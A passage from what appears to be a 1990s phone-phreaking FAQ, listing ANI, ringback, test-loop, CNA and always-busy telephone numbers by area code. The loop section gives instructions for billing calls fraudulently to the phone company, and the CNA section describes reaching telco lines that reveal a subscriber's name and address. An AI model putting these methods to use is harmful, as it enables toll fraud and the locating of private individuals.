  3411.   205  300-765-4321     Bessemer, AL
  3412.   205  300-798-1111     Forestdale, AL
  3413.   205  300-833-3333     Birmingham
  3414.   205  557-2311         Birmingham, AL
  3415.   205  811              Pell City/Cropwell/Lincoln, AL
  3416.   205  841-1111         Tarrant, AL
  3417.   205  908-222-2222     Birmingham, AL
  3418.   206  411              WA (Not US West)
  3419.   207  958              ME
  3420.   209  830-2121         Stockton, CA
  3421.   209  211-9779         Stockton, CA
  3422.   210  830              Brownsville/Laredo/San Antonio, TX
  3423. N 210  951              Brownsville/Laredo/San Antonio, TX (GTE)
  3424.   212  958              Manhattan, NY
  3425.   213  114              Los Angeles, CA (GTE)
  3426.   213  1223             Los Angeles, CA (Some 1AESS switches)
  3427.   213  211-2345         Los Angeles, CA (English response)
  3428.   213  211-2346         Los Angeles, CA (DTMF response)
  3429.   213  760-2???         Los Angeles, CA (DMS switches)
  3430.   213  61056            Los Angeles, CA
  3431.   214  570              Dallas, TX
  3432.   214  790              Dallas, TX (GTE)
  3433.   214  970-222-2222     Dallas, TX
  3434.   214  970-611-1111     Dallas, TX (Southwestern Bell)
  3435.   215  410-xxxx         Philadelphia, PA
  3436.   215  511              Philadelphia, PA
  3437.   215  958              Philadelphia, PA
  3438.   216  200-XXXX         Akron/Canton/Cleveland/Lorain/Youngstown, OH
  3439.   216  331              Akron/Canton/Cleveland/Lorain/Youngstown, OH
  3440.   216  959-9892         Akron/Canton/Cleveland/Lorain/Youngstown, OH
  3441.   217  200-xxx-xxxx     Champaign-Urbana/Springfield, IL
  3442.   219  550              Gary/Hammond/Michigan City/Southbend, IN
  3443.   219  559              Gary/Hammond/Michigan City/Southbend, IN
  3444. N 301  2002006969       Hagerstown/Rockville, MD
  3445.   301  958-9968         Hagerstown/Rockville, MD
  3446.   303  958              Aspen/Boulder/Denver/Durango/Grand Junction
  3447.                         /Steamboat Springs, CO
  3448. N 305  200-555-1212     Ft. Lauderdale/Key West/Miami, FL
  3449. N 305  200200200200200  Ft. Lauderdale/Key West/Miami, FL
  3450. N 305  780-2411         Ft. Lauderdale/Key West/Miami, FL
  3451.   310  114              Long Beach, CA (On many GTE switches)
  3452.   310  1223             Long Beach, CA (Some 1AESS switches)
  3453.   310  211-2345         Long Beach, CA (English response)
  3454.   310  211-2346         Long Beach, CA (DTMF response)
  3455.   312  200              Chicago, IL
  3456.   312  290              Chicago, IL
  3457.   312  1-200-8825       Chicago, IL (Last four change rapidly)
  3458.   312  1-200-555-1212   Chicago, IL
  3459.   313  200-200-2002     Ann Arbor/Dearborn/Detroit, MI
  3460.   313  200-222-2222     Ann Arbor/Dearborn/Detroit, MI
  3461.   313  200-xxx-xxxx     Ann Arbor/Dearborn/Detroit, MI
  3462.   313  200200200200200  Ann Arbor/Dearborn/Detroit, MI
  3463.   314  410-xxxx#        Columbia/Jefferson City/St.Louis, MO
  3464.   315  953              Syracuse/Utica, NY
  3465.   315  958              Syracuse/Utica, NY
  3466.   315  998              Syracuse/Utica, NY
  3467.   317  310-222-2222     Indianapolis/Kokomo, IN
  3468.   317  559-222-2222     Indianapolis/Kokomo, IN
  3469.   317  743-1218         Indianapolis/Kokomo, IN
  3470.   334  5572411          Montgomery, AL
  3471.   334 5572311           Montgomery, AL
  3472.   401  200-200-4444     RI
  3473.   401  222-2222         RI
  3474.   402  311              Lincoln, NE
  3475.   404  311              Atlanta, GA
  3476. N 770  780-2311         Atlanta, GA
  3477.   404  940-xxx-xxxx     Atlanta, GA
  3478.   404  990              Atlanta, GA
  3479.   405  890-7777777      Enid/Oklahoma City, OK
  3480.   405  897              Enid/Oklahoma City, OK
  3481. U 407  200-222-2222     Orlando/West Palm Beach, FL (Bell South)
  3482. N 407  520-3111         Orlando/West Palm Beach, FL (United)
  3483.   408  300-xxx-xxxx     San Jose, CA
  3484.   408  760              San Jose, CA
  3485.   408  940              San Jose, CA
  3486.   409  951              Beaumont/Galveston, TX
  3487.   409  970-xxxx         Beaumont/Galveston, TX
  3488.   410  200-6969         Annapolis/Baltimore, MD
  3489. N 410  200-200-6969     Annapolis/Baltimore, MD
  3490.   410  200-555-1212     Annapolis/Baltimore, MD
  3491.   410  811              Annapolis/Baltimore, MD
  3492.   412  711-6633         Pittsburgh, PA
  3493.   412  711-4411         Pittsburgh, PA
  3494.   412  999-xxxx         Pittsburgh, PA
  3495.   413  958              Pittsfield/Springfield, MA
  3496.   413  200-555-5555     Pittsfield/Springfield, MA
  3497.   414  330-2234         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  3498.   415  200-555-1212     San Francisco, CA
  3499.   415  211-2111         San Francisco, CA
  3500.   415  2222             San Francisco, CA
  3501.   415  640              San Francisco, CA
  3502.   415  760-2878         San Francisco, CA
  3503.   415  7600-2222        San Francisco, CA
  3504.   419  311              Toledo, OH
  3505. N 423  200-200-200      Chatanooga, Johnson City, Knoxville , TN
  3506. N 501  511              AR
  3507.   502  2002222222       Frankfort/Louisville/Paducah/Shelbyville, KY
  3508.   502  997-555-1212     Frankfort/Louisville/Paducah/Shelbyville, KY
  3509.   503  611              Portland, OR
  3510.   503  999              Portland, OR (GTE)
  3511.   504  99882233         Baton Rouge/New Orleans, LA
  3512.   504  201-269-1111     Baton Rouge/New Orleans, LA
  3513.   504  998              Baton Rouge/New Orleans, LA
  3514.   504  99851-0000000000 Baton Rouge/New Orleans, LA
  3515.   508  958              Fall River/New Bedford/Worchester, MA
  3516.   508  200-222-1234     Fall River/New Bedford/Worchester, MA
  3517.   508  200-222-2222     Fall River/New Bedford/Worchester, MA
  3518.   508  26011            Fall River/New Bedford/Worchester, MA
  3519.   509  560              Spokane/Walla Walla/Yakima, WA
  3520.   510  760-1111         Oakland, CA
  3521.   512  830              Austin/Corpus Christi, TX
  3522.   512  970-xxxx         Austin/Corpus Christi, TX
  3523. N 513  380-55555555     Cincinnati/Dayton, OH
  3524.   515  5463             Des Moines, IA
  3525.   515  811              Des Moines, IA
  3526.   516  958              Hempstead/Long Island, NY
  3527.   516  968              Hempstead/Long Island, NY
  3528.   517  200-222-2222     Bay City/Jackson/Lansing, MI
  3529.   517  200200200200200  Bay City/Jackson/Lansing, MI
  3530.   518  511              Albany/Schenectady/Troy, NY
  3531.   518  997              Albany/Schenectady/Troy, NY
  3532.   518  998              Albany/Schenectady/Troy, NY
  3533. N 540  211              Roanoke, VA (GTE)
  3534. N 540  311              Roanoke, VA (GTE)
  3535. N 541  200              Bend, OR
  3536.   603  200-222-2222     NH
  3537.   606  997-555-1212     Ashland/Winchester, KY
  3538.   606  711              Ashland/Winchester, KY
  3539.   607  993              Binghamton/Elmira, NY
  3540.   609  958              Atlantic City/Camden/Trenton/Vineland, NJ
  3541.   610  958              Allentown/Reading, PA
  3542.   610  958-4100         Allentown/Reading, PA
  3543.   612  511              Minneapolis/St.Paul, MN
  3544.   614  200              Columbus/Steubenville, OH
  3545.   614  571              Columbus/Steubenville, OH
  3546.   615  200200200200200  Chatanooga/Knoxville/Nashville, TN
  3547.   615  2002222222       Chatanooga/Knoxville/Nashville, TN
  3548.   615  830              Nashville, TN
  3549.   616  200-222-2222     Battle Creek/Grand Rapids/Kalamazoo, MI
  3550.   617  200-222-1234     Boston, MA
  3551.   617  200-222-2222     Boston, MA
  3552.   617  200-444-4444     Boston, MA (Woburn, MA)
  3553.   617  220-2622         Boston, MA
  3554.   617  958              Boston, MA
  3555.   618  200-xxx-xxxx     Alton/Cairo/Mt.Vernon, IL
  3556.   618  930              Alton/Cairo/Mt.Vernon, IL
  3557.   619  211-2001         San Diego, CA
  3558.   619  211-2121         San Diego, CA
  3559. N 659  220-2622         Newmarket, NH
  3560. N 703  211              VA
  3561. N 703  511-3636         Culpeper/Orange/Fredericksburg, VA
  3562.   703  811              Alexandria/Arlington/Roanoke, VA
  3563.   704  311              Asheville/Charlotte, NC
  3564. N 706  940-xxxx         Augusta, GA
  3565.   707  211-2222         Eureka, CA
  3566.   708  1-200-555-1212   Chicago/Elgin, IL
  3567.   708  1-200-8825       Chicago/Elgin, IL (Last four change rapidly)
  3568.   708  200-6153         Chicago/Elgin, IL
  3569.   708  724-9951         Chicago/Elgin, IL
  3570.   713  380              Houston, TX
  3571.   713  970-xxxx         Houston, TX
  3572.   713  811              Humble, TX
  3573. N 713  380-5555-5555    Houston, TX
  3574.   714  114              Anaheim, CA (GTE)
  3575.   714  211-2121         Anaheim, CA (PacBell)
  3576.   714  211-2222         Anaheim, CA (Pacbell)
  3577. N 714  211-7777         Anaheim, CA (Pacbell)
  3578.   716  511              Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)
  3579.   716  990              Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)
  3580.   717  958              Harrisburg/Scranton/Wilkes-Barre, PA
  3581.   718  958              Bronx/Brooklyn/Queens/Staten Island, NY
  3582. N 770  940-xxx-xxxx     Marietta/Norcross, GA
  3583. N 770  780-2311         Marietta/Norcross, GA
  3584.   802  2-222-222-2222   Vermont
  3585.   802  200-222-2222     Vermont
  3586.   802  1-700-222-2222   Vermont
  3587.   802  111-2222         Vermont
  3588. N 804 990               Virginia Beach, VA
  3589.   805  114              Bakersfield/Santa Barbara, CA
  3590.   805  211-2345         Bakersfield/Santa Barbara, CA
  3591.   805  211-2346         Bakersfield/Santa Barbara, CA (Returns DTMF)
  3592.   805  830              Bakersfield/Santa Barbara, CA
  3593.   806  970-xxxx         Amarillo/Lubbock, TX
  3594.   810  200200200200200  Flint/Pontiac/Southfield/Troy, MI
  3595. N 810  311              Pontiac/Southfield/Troy, MI
  3596.   812  410-555-1212     Evansville, IN
  3597.   813  311              Ft. Meyers/St. Petersburg/Tampa, FL
  3598. N 815  200-3374         Crystal Lake, IL
  3599. N 815  270-3374         Crystal Lake, IL
  3600. N 815  770-3374         Crystal Lake, IL
  3601.   815  200-xxx-xxxx     La Salle/Rockford, IL
  3602.   815  290              La Salle/Rockford, IL
  3603.   817  211              Ft. Worth/Waco, TX
  3604.   817  970-611-1111     Ft. Worth/Waco, TX  (Southwestern Bell)
  3605.   818  1223             Pasadena, CA (Some 1AESS switches)
  3606.   818  211-2345         Pasadena, CA (English response)
  3607.   818  211-2346         Pasadena, CA (DTMF response)
  3608. N 860  970              CT
  3609.   903  970-611-1111     Tyler, TX
  3610.   904  200-222-222      Jackonsville/Pensacola/Tallahasee, FL
  3611.   906  1-200-222-2222   Marquette/Sault Ste. Marie, MI
  3612.   907  811              AK
  3613.   908  958              New Brunswick, NJ
  3614. N 909  111              Riverside/San Bernardino, CA (GTE)
  3615.   910  200              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  3616.   910  311              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  3617.   910  988              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
  3618.   914  990-1111         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  3619.   915  970-xxxx         Abilene/El Paso, TX
  3620. N 916  211-0007         Sacramento, CA (Pac Bell)
  3621.   916  461              Sacramento, CA (Roseville Telephone)
  3622.   919  200              Durham, NC
  3623.   919  711              Durham, NC
  3624. N 954  200-555-1212     Ft. Lauderdale, FL
  3625. N 954  200200200200200  Ft. Lauderdale, FL
  3626. N 954  780-2411         Ft. Lauderdale, FL
  3627.  
  3628.   Canada:
  3629.   204  644-4444         Manitoba
  3630.   306  115              Saskatchewan
  3631.   403  311              Alberta, Yukon and N.W. Territory
  3632.   403  908-222-2222     Alberta, Yukon and N.W. Territory
  3633.   403  999              Alberta, Yukon and N.W. Territory
  3634.   416  997-xxxx         Toronto, Ontario
  3635.   506  1-555-1313       New Brunswick
  3636.   514  320-xxxx         Montreal, Quebec
  3637. U 514  320-1232         Montreal, Quebec
  3638. U 514  320-1223         Montreal, Quebec
  3639. U 514  320-1233         Montreal, Quebec
  3640.   519  320-xxxx         London, Ontario
  3641.   604  1116             British Columbia
  3642.   604  1211             British Columbia
  3643.   604  211              British Columbia
  3644.   613  320-2232         Ottawa, Ontario
  3645.   705  320-4567         North Bay/Saulte Ste. Marie, Ontario
  3646. N 819  320-1112         Quebec
  3647.  
  3648.   Australia:
  3649.   +61  03-552-4111      Victoria 03 area
  3650.   +612 19123            All major capital cities
  3651.   +612 11544
  3652.  
  3653.   United Kingdom:
  3654.   175
  3655.  
  3656.   Israel:
  3657.   110
  3658.  
  3659.  
  3660. 12. What is a ringback number?
  3661.  
  3662. A ringback number is a number that you call that will immediately
  3663. ring the telephone from which it was called.
  3664.  
  3665. In most instances you must call the ringback number, quickly hang up
  3666. the phone for just a short moment and then let up on the switch, you
  3667. will then go back off hook and hear a different tone.  You may then
  3668. hang up.  You will be called back seconds later.
  3669.  
  3670.  
  3671. 13. What is the ringback number for my area?
  3672.  
  3673. An 'x' means insert those numbers from the phone number from which you
  3674. are calling.  A '?' means that the number varies from switch to switch
  3675. in the area, or changes from time to time.  Try all possible
  3676. combinations.
  3677.  
  3678. If the ringback for your NPA is not listed, try common ones such as 114,
  3679. 951-xxx-xxxx, 954, 957 and 958.  Also, try using the numbers listed for
  3680. other NPA's served by your telephone company.
  3681.  
  3682. Note: These geographic areas are for reference purposes only.  Ringback
  3683. numbers may vary from switch to switch within the same city.
  3684.  
  3685.  
  3686.  
  3687.   NPA  Ringback number  Approximate Geographic area
  3688.   ---  ---------------  ---------------------------------------------
  3689.   201  55?-xxxx         Hackensack/Jersey City/Newark/Paterson, NJ
  3690.   202  958-xxxx         District of Columbia
  3691.   203  99?-xxxx         CT
  3692.   206  571-xxxx         WA
  3693. N 208  59X-xxxx         ID
  3694.   208  99xxx-xxxx       ID
  3695. N 210  211-8849-xxxx    Brownsville/Laredo/San Antonio, TX (GTE)
  3696.   213  1-95x-xxxx       Los Angeles, CA
  3697. N 214  971-xxxx         Dallas, TX
  3698.   215  811-xxxx         Philadelphia, PA
  3699.   216  551-xxxx         Akron/Canton/Cleveland/Lorain/Youngstown, OH
  3700.   219  571-xxx-xxxx     Gary/Hammond/Michigan City/Southbend, IN
  3701.   219  777-xxx-xxxx     Gary/Hammond/Michigan City/Southbend, IN
  3702.   301  579-xxxx         Hagerstown/Rockville, MD
  3703.   301  958-xxxx         Hagerstown/Rockville, MD
  3704.   303  99X-xxxx         Grand Junction, CO
  3705.   304  998-xxxx         WV
  3706.   305  999-xxxx         Ft. Lauderdale/Key West/Miami, FL
  3707.   312  511-xxxx         Chicago, IL
  3708.   312  511-xxx-xxxx     Chicago, IL
  3709.   312  57?-xxxx         Chicago, IL
  3710.   315  98x-xxxx         Syracuse/Utica, NY
  3711.   317  777-xxxx         Indianapolis/Kokomo, IN
  3712.   317  yyy-xxxx         Indianapolis/Kokomo, IN (y=3rd digit of phone number)
  3713.   319  79x-xxxx         Davenport/Dubuque, Iowa
  3714.   334  901-xxxx         Montgomery, AL
  3715.   401  98?-xxxx         RI
  3716.   404  450-xxxx         Atlanta, GA
  3717.   407  988-xxxx         Orlando/West Palm Beach, FL
  3718.   408  470-xxxx         San Jose, CA
  3719.   408  580-xxxx         San Jose, CA
  3720.   412  985-xxxx         Pittsburgh, PA
  3721.   414  977-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  3722.   414  978-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
  3723.   415  350-xxxx         San Francisco, CA
  3724.   417  551-xxxx         Joplin/Springfield, MO
  3725.   501  221-xxx-xxxx     AR
  3726.   501  721-xxx-xxxx     AR
  3727.   502  988              Frankfort/Louisville/Paducah/Shelbyville, KY
  3728.   503  541-XXXX         OR
  3729.   504  99x-xxxx         Baton Rouge/New Orleans, LA
  3730.   504  9988776655       Baton Rouge/New Orleans, LA
  3731.   505  59?-xxxx         New Mexico
  3732.   512  95X-xxxx         Austin, TX
  3733.   513  951-xxxx         Cincinnati/Dayton, OH
  3734.   513  955-xxxx         Cincinnati/Dayton, OH
  3735.   513  99?-xxxx         Cincinnati/Dayton, OH (X=0, 1, 2, 3, 4, 8 or 9)
  3736. N 515  559-XXXX         Des Moines, IA
  3737.   516  660-xxx-xxxx     Hempstead/Long Island, NY
  3738.   601  777-xxxx         MS
  3739.   609  55?-xxxx         Atlantic City/Camden/Trenton/Vineland, NJ
  3740.   610  811-xxxx         Allentown/Reading, PA
  3741.   612  511              Minneapolis/St.Paul, MN
  3742.   612  999-xxx-xxxx     Minneapolis/St.Paul, MN
  3743. N 613  999-xxx-xxxx     Ottawa, Ontario
  3744.   614  998-xxxx         Columbus/Steubenville, OH
  3745.   615  920-XXXX         Chatanooga/Knoxville/Nashville, TN
  3746.   615  930-xxxx         Chatanooga/Knoxville/Nashville, TN
  3747.   616  946-xxxx         Battle Creek/Grand Rapids/Kalamazoo, MI
  3748.   619  331-xxxx         San Diego, CA
  3749.   619  332-xxxx         San Diego, CA
  3750. N 659  981-XXXX         Newmarket, NH
  3751. N 703  511-xxx-xxxx     VA
  3752.   703  958-xxxx         Alexandria/Arlington/Roanoke, VA
  3753.   708  511-xxxx         Chicago/Elgin, IL
  3754. N 713  231-xxxx         Los Angeles, CA
  3755.   714  330?             Anaheim, CA (GTE)
  3756.   714  33?-xxxx         Anaheim, CA (PacBell)
  3757.   716  981-xxxx         Rochester, NY (Rochester Tel)
  3758.   718  660-xxxx         Bronx/Brooklyn/Queens/Staten Island, NY
  3759.   719  99x-xxxx         Colorado Springs/Leadville/Pueblo, CO
  3760.   801  938-xxxx         Utah
  3761.   801  939-xxxx         Utah
  3762.   802  987-xxxx         Vermont
  3763.   804  260              Charlottesville/Newport News/Norfolk/Richmond, VA
  3764.   805  114              Bakersfield/Santa Barbara, CA
  3765.   805  980-xxxx         Bakersfield/Santa Barbara, CA
  3766.   810  951-xxx-xxxx     Pontiac/Southfield/Troy, MI
  3767.   813  711              Ft. Meyers/St. Petersburg/Tampa, FL
  3768.   817  971              Ft. Worth/Waco, TX (Flashhook, then 2#)
  3769.   906  951-xxx-xxxx     Marquette/Sault Ste. Marie, MI
  3770.   908  55?-xxxx         New Brunswick, NJ
  3771.   908  953              New Brunswick, NJ
  3772.   913  951-xxxx         Lawrence/Salina/Topeka, KS
  3773.   914  660-xxxx-xxxx    Peekskill/Poughkeepsie/White Plains/Yonkers, NY
  3774.  
  3775.   Canada:
  3776.   204  590-xxx-xxxx     Manitoba
  3777.   416  57x-xxxx         Toronto, Ontario
  3778.   416  99x-xxxx         Toronto, Ontario
  3779.   416  999-xxx-xxxx     Toronto, Ontario
  3780.   506  572+xxx-xxxx     New Brunswick
  3781.   514  320-xxx-xxxx     Montreal, Quebec
  3782.   519  999-xxx-xxxx     London, Ontario
  3783. N 604  311-xxx-xxxx     British Columbia
  3784.   613  999-xxx-xxxx     Ottawa, Ontario
  3785.   705  999-xxx-xxxx     North Bay/Saulte Ste. Marie, Ontario
  3786. N 819  320-xxx-xxxx     Quebec
  3787. N 905  999-xxx-xxxx     Hamilton/Mississauga/Niagra Falls, Ontario
  3788.  
  3789.   Australia:            +61 199
  3790.   Brazil:               109 or 199
  3791. N France:               3644
  3792.   Holland:              99-xxxxxx
  3793.   New Zealand:          137
  3794.   Sweden:               0058
  3795.   United Kingdom:       174 or 1744 or 175 or 0500-89-0011
  3796. N Amsterdam             0196
  3797. N Hilversum             0123456789
  3798. N Breukelen             0123456789
  3799. N Groningen             951
  3800.  
  3801.  
  3802. 14. What is a loop?
  3803.  
  3804. This FAQ answer is excerpted from: ToneLoc v0.99 User Manual
  3805. ....   by Minor Threat & Mucho Maas
  3806.  
  3807. Loops are a pair of phone numbers, usually consecutive, like 836-9998
  3808. and 836-9999.  They are used by the phone company for testing.  What
  3809. good do loops do us?  Well, they are cool in a few ways.  Here is a
  3810. simple use of loops.  Each loop has two ends, a 'high' end, and a
  3811. 'low' end.  One end gives a (usually) constant, loud tone when it is
  3812. called. The other end is silent.  Loops don't usually ring either.
  3813. When BOTH ends are called, the people that called each end can talk
  3814. through the loop.  Some loops are voice filtered and won't pass
  3815. anything but a constant tone; these aren't much use to you.  Here's
  3816. what you can use working loops for:  billing phone calls!  First, call
  3817. the end that gives the loud tone.  Then if the operator or someone
  3818. calls the other end, the tone will go quiet.  Act like the phone just
  3819. rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or
  3820. what the fuck ever.  The operator thinks that she just called you, and
  3821. that's it!  Now the phone bill will go to the loop, and your local
  3822. RBOC will get the bill!  Use this technique in moderation, or the loop
  3823. may go down.  Loops are probably most useful when you want to talk to
  3824. someone to whom you don't want to give your phone number.
  3825.  
  3826.  
  3827. 15. What is a loop in my area?
  3828.  
  3829. Many of these loops are no longer functional.  If you are local
  3830. to any of these loops, please try them out an e-mail me the results
  3831. of your research.
  3832.  
  3833.   NPA    High      Low
  3834.   ---  --------  --------
  3835.   201  666-9929  666-9930
  3836.   208  862-9996  862-9997
  3837.   209  732-0044  732-0045
  3838.   201  666-9929  666-9930
  3839.   213  360-1118  360-1119
  3840.   213  365-1118  365-1119
  3841.   213  455-0002  455-XXXX
  3842.   213  455-0002  455-xxxx
  3843.   213  546-0002  546-XXXX
  3844.   213  546-0002  546-xxxx
  3845.   213  549-1118  549-1119
  3846.   305  964-9951  964-9952
  3847.   307  468-9999  468-9998
  3848.   308  357-0004  357-0005
  3849.   312  262-9902  262-9903
  3850.   313  224-9996  224-9997
  3851.   313  225-9996  225-9997
  3852.   313  234-9996  234-9997
  3853.   313  237-9996  237-9997
  3854.   313  256-9996  256-9997
  3855.   313  272-9996  272-9997
  3856.   313  273-9996  273-9997
  3857.   313  277-9996  277-9997
  3858.   313  281-9996  281-9997
  3859.   313  292-9996  292-9997
  3860.   313  299-9996  299-9997
  3861.   313  321-9996  321-9997
  3862.   313  326-9996  326-9997
  3863.   313  356-9996  356-9997
  3864.   313  362-9996  362-9997
  3865.   313  369-9996  369-9997
  3866.   313  388-9996  388-9997
  3867.   313  397-9996  397-9997
  3868.   313  399-9996  399-9997
  3869.   313  445-9996  445-9997
  3870.   313  465-9996  465-9997
  3871.   313  471-9996  471-9997
  3872.   313  474-9996  474-9997
  3873.   313  477-9996  477-9997
  3874.   313  478-9996  478-9997
  3875.   313  483-9996  483-9997
  3876.   313  497-9996  497-9997
  3877.   313  526-9996  526-9997
  3878.   313  552-9996  552-9997
  3879.   313  556-9996  556-9997
  3880.   313  561-9996  561-9997
  3881.   313  569-9996  569-9996
  3882.   313  575-9996  575-9997
  3883.   313  577-9996  577-9997
  3884.   313  585-9996  585-9997
  3885.   313  591-9996  591-9997
  3886.   313  621-9996  621-9997
  3887.   313  626-9996  626-9997
  3888.   313  644-9996  644-9997
  3889.   313  646-9996  646-9997
  3890.   313  647-9996  647-9997
  3891.   313  649-9996  649-9997
  3892.   313  663-9996  663-9997
  3893.   313  665-9996  665-9997
  3894.   313  683-9996  683-9997
  3895.   313  721-9996  721-9997
  3896.   313  722-9996  722-9997
  3897.   313  728-9996  728-9997
  3898.   313  731-9996  731-9997
  3899.   313  751-9996  751-9997
  3900.   313  776-9996  776-9997
  3901.   313  781-9996  781-9997
  3902.   313  787-9996  787-9997
  3903.   313  822-9996  822-9997
  3904.   313  833-9996  833-9997
  3905.   313  851-9996  851-9997
  3906.   313  871-9996  871-9997
  3907.   313  875-9996  875-9997
  3908.   313  886-9996  886-9997
  3909.   313  888-9996  888-9997
  3910.   313  898-9996  898-9997
  3911.   313  934-9996  934-9997
  3912.   313  942-9996  942-9997
  3913.   313  963-9996  963-9997
  3914.   313  977-9996  977-9997
  3915.   315  673-9995  673-9996
  3916.   315  695-9995  695-9996
  3917.   402  422-0001  422-0002
  3918.   402  422-0003  422-0004
  3919.   402  422-0005  422-0006
  3920.   402  422-0007  422-0008
  3921.   402  572-0003  572-0004
  3922.   402  779-0004  779-0007
  3923.   406  225-9902  225-9903
  3924. N 408  238-0044  238-0045
  3925. N 408  272-0044  272-0045
  3926. N 408  729-0044  729-0045
  3927. N 408  773-0044  773-0045
  3928. N 408  926-0044  926-0045
  3929.   517  422-9996  422-9997
  3930.   517  423-9996  423-9997
  3931.   517  455-9996  455-9997
  3932.   517  563-9996  563-9997
  3933.   517  663-9996  663-9997
  3934.   517  851-9996  851-9997
  3935.   609  921-9929  921-9930
  3936.   609  994-9929  994-9930
  3937.   613            966-1111
  3938.   616  997-9996  997-9997
  3939.   708  724-9951  724-????
  3940.   713  224-1499  759-1799
  3941.   713  324-1499  324-1799
  3942.   713  342-1499  342-1799
  3943.   713  351-1499  351-1799
  3944.   713  354-1499  354-1799
  3945.   713  356-1499  356-1799
  3946.   713  442-1499  442-1799
  3947.   713  447-1499  447-1799
  3948.   713  455-1499  455-1799
  3949.   713  458-1499  458-1799
  3950.   713  462-1499  462-1799
  3951.   713  466-1499  466-1799
  3952.   713  468-1499  468-1799
  3953.   713  469-1499  469-1799
  3954.   713  471-1499  471-1799
  3955.   713  481-1499  481-1799
  3956.   713  482-1499  482-1799
  3957.   713  484-1499  484-1799
  3958.   713  487-1499  487-1799
  3959.   713  489-1499  489-1799
  3960.   713  492-1499  492-1799
  3961.   713  493-1499  493-1799
  3962.   713  524-1499  524-1799
  3963.   713  526-1499  526-1799
  3964.   713  555-1499  555-1799
  3965.   713  661-1499  661-1799
  3966.   713  664-1499  664-1799
  3967.   713  665-1499  665-1799
  3968.   713  666-1499  666-1799
  3969.   713  667-1499  667-1799
  3970.   713  682-1499  976-1799
  3971.   713  771-1499  771-1799
  3972.   713  780-1499  780-1799
  3973.   713  781-1499  997-1799
  3974.   713  960-1499  960-1799
  3975.   713  977-1499  977-1799
  3976.   713  988-1499  988-1799
  3977. N 719  598-0009  598-0010
  3978.   805  528-0044  528-0045
  3979.   805  544-0044  544-0045
  3980.   805  773-0044  773-0045
  3981.   808  235-9907  235-9908
  3982.   808  239-9907  239-9908
  3983.   808  245-9907  245-9908
  3984.   808  247-9907  247-9908
  3985.   808  261-9907  261-9908
  3986.   808  322-9907  322-9908
  3987.   808  328-9907  328-9908
  3988.   808  329-9907  329-9908
  3989.   808  332-9907  332-9908
  3990.   808  335-9907  335-9908
  3991.   808  572-9907  572-9908
  3992.   808  623-9907  623-9908
  3993.   808  624-9907  624-9908
  3994.   808  668-9907  668-9908
  3995.   808  742-9907  742-9908
  3996.   808  879-9907  879-9908
  3997.   808  882-9907  882-9908
  3998.   808  885-9907  885-9908
  3999.   808  959-9907  959-9908
  4000.   808  961-9907  961-9908
  4001.   810  362-9996  362-9997
  4002.   813  385-9971  385-xxxx
  4003.   908  254-9929  254-9930
  4004.   908  558-9929  558-9930
  4005.   908  560-9929  560-9930
  4006.   908  776-9930  776-9930
  4007.  
  4008.  
  4009. 16. What is a CNA number?
  4010.  
  4011. CNA stands for Customer Name and Address.  The CNA number is a phone
  4012. number for telephone company personnel to call and get the name and
  4013. address for a phone number.  If a telephone lineman finds a phone line
  4014. he does not recognize, he can use the ANI number to find its phone
  4015. number and then call the CNA operator to see who owns it and where
  4016. they live.
  4017.  
  4018. Normal CNA numbers are available only to telephone company personnel.
  4019. Private citizens may legally get CNA information from private
  4020. companies.  Two such companies are:
  4021.  
  4022. Unidirectory    (900)933-3330
  4023. Telename        (900)884-1212
  4024.  
  4025. Note that these are 900 numbers, and will cost you approximately one
  4026. dollar per minute.
  4027.  
  4028. If you are in 312 or 708, AmeriTech has a pay-for-play CNA service
  4029. available to the general public.  The number is 796-9600.  The cost is
  4030. $.35/call and can look up two numbers per call.
  4031.  
  4032. If you are in 415, Pacific Bell offers a public access CNL service at
  4033. (415)705-9299.
  4034.  
  4035. If you are in Bell Atlantic territory you can call (201)555-5454 or
  4036. (908)555-5454 for automated CNA information.  The cost is $.50/call.
  4037.  
  4038.  
  4039. 17. What is the telephone company CNA number for my area?
  4040.  
  4041.   203    (203)771-8080         CT
  4042.   312    (312)796-9600         Chicago, IL
  4043.   506    (506)555-1313         New Brunswick
  4044.   513    (513)397-9110         Cincinnati/Dayton, OH
  4045.   516    (516)321-5700         Hempstead/Long Island, NY
  4046.   614    (614)464-0123         Columbus/Steubenville, OH
  4047.   813    (813)270-8711         Ft. Meyers/St. Petersburg/Tampa, FL
  4048.   NYNEX  (518)471-8111         New York, Connecticut, Vermont, Rhode
  4049.                                Island, New Hampshire, and Massachusetts
  4050.  
  4051.  
  4052. 18. What are some numbers that always ring busy?
  4053.  
  4054. In the following listings, "xxx" means that the same number is used as a
  4055. constantly busy number in many different prefixes.  In most of these,
  4056. there are some exchanges that ring busy and some exchanges that are in
  4057. normal use.  *ALWAYS* test these numbers at least three times during
  4058. normal business hours before using as a constantly busy number.
  4059.  
  4060. N 800  999-1803              WATS
  4061. N 201  635-9970              Hackensack/Jersey City/Newark/Paterson, NJ
  4062. N 212  724-9970              Manhattan, NY
  4063. N 213  xxx-1117              Los Angeles, CA
  4064. N 213  xxx-1118              Los Angeles, CA
  4065. N 213  xxx-1119              Los Angeles, CA
  4066. N 213  xxx-9198              Los Angeles, CA
  4067.   216  xxx-9887              Akron/Canton/Cleveland/Lorain/Youngstown, OH
  4068.   303  431-0000              Denver, CO
  4069.   303  866-8660              Denver, CO
  4070. N 310  xxx-1117              Long Beach, CA
  4071. N 310  xxx-1118              Long Beach, CA
  4072. N 310  xxx-1119              Long Beach, CA
  4073. N 310  xxx-9198              Long Beach, CA
  4074.   316  952-7265              Dodge City/Wichita, KS
  4075.   501  377-99xx              AR
  4076. U 719  472-3772              Colorado Springs/Leadville/Pueblo, CO
  4077.   805  255-0699              Bakersfield/Santa Barbara, CA
  4078. N 714  xxx-1117              Anaheim, CA
  4079. N 714  xxx-1118              Anaheim, CA
  4080. N 714  xxx-1119              Anaheim, CA
  4081. N 714  xxx-9198              Anaheim, CA
  4082. N 717  292-0009              Harrisburg/Scranton/Wilkes-Barre, PA
  4083. N 818  xxx-1117              Pasadena, CA
  4084. N 818  xxx-1118              Pasadena, CA
